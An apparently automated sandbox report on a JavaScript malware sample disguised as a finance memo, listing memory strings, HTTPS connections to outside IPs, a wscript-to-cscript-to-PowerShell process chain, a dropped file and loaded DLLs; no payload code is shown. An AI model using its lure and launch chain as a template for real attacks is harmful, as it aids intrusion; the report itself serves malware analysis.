00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://promisesaplus.com/#point-48
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://promisesaplus.com/#point-54
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://promisesaplus.com/#point-57
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://promisesaplus.com/#point-59
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://promisesaplus.com/#point-61
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://promisesaplus.com/#point-64
Source: wscript.exe, 00000000.00000003.1194354004.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1228251691.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1208550958.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1209482155.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1233153622.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217298039.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.874936311.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873944320.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1222749323.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1231469711.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1213262260.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1246519993.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1235314394.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.872010062.0000025483F63000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1217932911.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215231734.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1207099446.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1238433212.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1197459747.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.873585809.00000254843FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1191957807.00000254843FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://promisesaplus.com/#point-75
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 172.105.162.7:443 -> 192.168.11.20:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.167.35:443 -> 192.168.11.20:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 129.232.136.170:443 -> 192.168.11.20:49716 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.198.240.43:443 -> 192.168.11.20:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 67.205.27.249:443 -> 192.168.11.20:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.218.116.137:443 -> 192.168.11.20:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 141.193.213.10:443 -> 192.168.11.20:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 66.198.240.43:443 -> 192.168.11.20:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 197.189.243.212:443 -> 192.168.11.20:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 194.163.167.35:443 -> 192.168.11.20:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 129.232.136.170:443 -> 192.168.11.20:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 141.193.213.10:443 -> 192.168.11.20:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.10.224:443 -> 192.168.11.20:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.105.162.7:443 -> 192.168.11.20:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 197.189.243.212:443 -> 192.168.11.20:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.1.204:443 -> 192.168.11.20:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.218.116.137:443 -> 192.168.11.20:49747 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
Source: Memo - Impairment Test 2023 MEX010B (5).jsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal76.expl.evad.winJS@19/13@12/10
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Solutions Enabler.xmlJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy1qhor5.g43.ps1Jump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js"
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE AUTOMO~1.JS
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cscript.exe cscript AUTOMO~1.JS
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE AUTOMO~1.JS
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS"
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cscript.exe cscript AUTOMO~1.JS
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cscript.exe cscript AUTOMO~1.JSJump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershellJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cscript.exe cscript AUTOMO~1.JSJump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershellJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
